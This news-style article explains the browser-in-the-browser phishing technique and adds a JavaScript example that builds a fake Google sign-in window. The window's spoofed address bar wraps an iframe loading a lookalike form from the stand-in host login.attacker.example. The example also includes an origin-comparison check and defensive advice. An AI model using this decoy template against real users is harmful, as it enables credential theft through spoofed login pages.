New Browser-in-the-Browser attack could be used for phishing

A novel way of tricking people out of their passwords has left us wondering if there’s a need to rethink how much we trust our web browsers to protect us and to accelerate efforts to close web security gaps.

Earlier this week, an infosec researcher known as mr.d0x described a browser-in-the-browser (BitB) attack. It is a way to steal login credentials by simulating, with ordinary HTML and CSS inside the attacker's own page, the little browser windows that Google, Microsoft, and other authentication service providers pop up to ask for your username and password before you can continue. You have probably seen these windows: you click on something like a "Sign in with Microsoft" button on a website, and a popup appears asking for your credentials to access your account or profile.

Services like Google Sign-In will display a Google URL in the popup window's address bar, which offers some reassurance that the login page is actually coming from a trusted company and not an unknown one. That reassurance only holds for a genuine popup, whose address bar is drawn by the browser itself. In a BitB decoy the "address bar" is just page content, so it can show any URL the attacker likes while the form underneath it submits your password somewhere else entirely. One practical check: try to drag the popup outside the edges of the main browser window. A real popup is a separate window and moves freely; a fake one is part of the phishing page and gets clipped at the edge of the tab.
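To make that concrete, here is an added example (not code from the article or from mr.d0x's proof of concept) that builds a minimal BitB decoy as an HTML string and then shows that the URL displayed in its fake address bar and the origin that actually receives the credentials are completely independent. The attacker host `login.attacker.example` is hypothetical, and the class names and inline styles are illustrative; only the spoofed Google URL is a real-looking target.

```javascript
// Added example, not from the article or from mr.d0x's PoC: models why the URL
// shown in a browser-in-the-browser (BitB) decoy proves nothing. The decoy
// "popup" is ordinary HTML inside the phishing page, so the attacker picks the
// address-bar text independently of where the credential form really lives.
// Host names other than the spoofed Google URL are hypothetical.

const SPOOFED_URL = "https://accounts.google.com/o/oauth2/auth"; // text shown in the fake address bar
const ATTACKER_FRAME = "https://login.attacker.example/fake-google.html"; // hypothetical attacker host

// Build the decoy: a <div> styled like OS window chrome (title bar plus a fake
// address bar with a padlock) wrapping an <iframe> that loads the attacker's
// lookalike login form. The real provider login page refuses to be framed, so
// a BitB page has to serve its own copy of the form.
function buildBitbDecoy(displayedUrl, frameSrc) {
  return [
    '<div class="bitb-window" style="position:fixed;top:20%;left:30%;width:440px;',
    'border:1px solid #888;border-radius:8px;background:#fff;font-family:sans-serif">',
    '  <div class="bitb-titlebar" style="background:#eee;padding:6px">Sign in - Google Accounts</div>',
    '  <div class="bitb-urlbar" style="padding:6px;color:#333">&#128274; ' + displayedUrl + '</div>',
    '  <iframe class="bitb-content" src="' + frameSrc + '" style="width:100%;height:520px;border:0"></iframe>',
    '</div>',
  ].join('\n');
}

// Compare what the victim is shown with where the credentials actually go.
// Returns both origins and whether they disagree (i.e. the decoy is spoofing).
function analyseDecoy(html) {
  const shown = html.match(/class="bitb-urlbar"[^>]*>(?:&#128274; )?([^<]+)</);
  const frame = html.match(/<iframe[^>]*\ssrc="([^"]+)"/);
  if (!shown || !frame) throw new Error("decoy markup not recognised");
  const shownOrigin = new URL(shown[1].trim()).origin;
  const actualOrigin = new URL(frame[1]).origin;
  return { shownOrigin, actualOrigin, spoofed: shownOrigin !== actualOrigin };
}

// Usage: the fake bar says accounts.google.com, the form is on the attacker host.
console.log(analyseDecoy(buildBitbDecoy(SPOOFED_URL, ATTACKER_FRAME)));
```

The takeaway is that nothing inside the decoy can be trusted: the padlock, the title bar and the URL are all strings chosen by the page. Only browser-drawn UI (the real address bar of a real window) and tools that key off the true origin, such as a password manager that refuses to autofill on `login.attacker.example`, give a reliable signal.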

Source: The Register